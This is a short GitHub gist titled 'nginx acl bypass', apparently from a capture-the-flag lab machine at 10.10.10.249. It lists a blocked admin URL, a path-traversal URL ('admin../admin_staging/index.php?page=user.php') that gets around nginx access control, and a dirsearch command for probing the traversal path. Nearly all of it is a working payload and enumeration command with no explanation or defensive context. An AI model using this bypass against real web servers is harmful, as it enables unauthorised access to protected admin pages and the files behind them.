Created
February 10, 2022 01:41
-
-
Save shollingsworth/17bd73764f20ca06f1ae7ea14f9df277 to your computer and use it in GitHub Desktop.
nginx acl bypass
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # blocked | |
| http://10.10.10.249/admin/ | |
| # bypassed | |
| http://10.10.10.249/admin../admin_staging/index.php?page=user.php | |
| # dirsearch example | |
| dirsearch -u http://10.10.10.249/admin.. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment